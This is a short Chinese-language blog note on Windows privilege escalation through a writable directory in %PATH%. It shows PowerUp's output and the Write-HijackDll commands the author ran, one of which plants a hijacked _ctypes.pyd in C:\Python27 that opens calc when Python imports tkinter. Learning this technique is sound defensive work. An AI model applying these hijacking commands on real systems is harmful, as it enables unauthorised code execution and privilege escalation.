zoukankan      html  css  js  c++  java
  • windows 利用环境变量%PATH%中目录可写提权

    使用PowerUp的时候有时候会有这种结果

    [*] Checking %PATH% for potentially hijackable DLL locations...
    
    
    Permissions       : {ReadAttributes, ReadControl, Execute/Traverse, WriteAttrib
                        utes...}
    ModifiablePath    : C:Python27
    IdentityReference : NT AUTHORITYAuthenticated Users
    %PATH%            : C:Python27
    AbuseFunction     : Write-HijackDll -DllPath 'C:Python27\wlbsctrl.dll'

    这种方法和直接改dll不一样,

    这个方法的原理是执行当前exe的时候会先在当前目录下搜索DLL进行加载

    这里的话,先执行Write-HijackDll -DllPath "c:Python27 k85.dll" 这个dll是要根据实际执行的程序修改

    然后在c:python27目录下执行python,执行import tkinter

    用process explorer检查发现虽然tk85.dll加载进来了,但是不是加载的我们写入的dll

    不行的原因可以看这篇文章

    https://docs.microsoft.com/zh-cn/windows/desktop/Dlls/dynamic-link-library-search-order

    不过用process explorer检查进程的时候发现还有一些pyd被加载进去了

    于是执行Write-HijackDll -DllPath "c:Python27\_ctypes.pyd" -Command "calc" 

    再在python 解释器里import tkinter时就可以弹出计算器,

    这里只是Authenticated Users组,并没有加用户的权限,所以在这个地方并没有什么用,不过也算学到点东西,简单记录下

    哪天遇到个实例再补充

  • 相关阅读:
    问题 D: 错误探测
    问题 C: 计算矩阵边缘元素之和
    同行列对角线的格子
    矩形交换行
    问题 R: 鸡尾酒疗法
    问题 : 字符串p型编码
    循环结构 整数的个数
    字符串c++字符环
    ISBN码字符串c++
    Uva
  • 原文地址:https://www.cnblogs.com/junmoxiao/p/9992438.html
Copyright © 2011-2022 走看看